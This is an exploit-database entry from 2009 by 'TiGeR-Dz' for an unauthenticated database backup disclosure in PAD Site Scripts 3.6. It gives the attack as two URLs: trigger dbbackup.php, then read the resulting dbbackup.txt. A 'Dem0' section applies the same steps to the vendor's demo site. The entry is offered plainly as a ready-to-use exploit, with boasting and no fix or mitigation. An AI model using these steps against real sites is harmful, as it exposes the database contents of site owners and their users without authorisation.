[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PAD Site Scripts 3.6 Remote Arbitrary Database Backup Vulnerability
# Published : 2009-06-01
# Author : TiGeR-Dz
# Previous Title : R2 Newsletter Lite/Pro/Stats (admin.mdb) Database Disclosure Vuln
# Next Title : AdaptBB 1.0 (forumspath) Remote File Inclusion Vulnerability


---------------------------------------------------------------
---------------------------------------------------------------
PAD Site Scripts v3.6 Bypass DB Backup Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.pad-site-scripts.com
Script:PAD Site Scripts v3.6
Download:http://www.pad-site-scripts.com/demo.php
Thank you my best Friends The g0bL!N and Hisok4
---------------------------------------------------------------
Exploit
-------
www.site.com/[path]/dbbackup.php
Note: We can not download Backup Because This site is required name admin and password for download Backup
and We will read Backup Without Download
Go to www.site.com/dbbackup.txt

And booooooooooom The backup is reading :)
----------------------------------------------------------------
Dem0
----
http://demo.pad-site-scripts.com/sysop/dbbackup.php
Go to
http://demo.pad-site-scripts.com/dbbackup.txt

And booooooooooom The backup is reading :)
--------------------------------------
Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

# www.Syue.com [2009-06-01]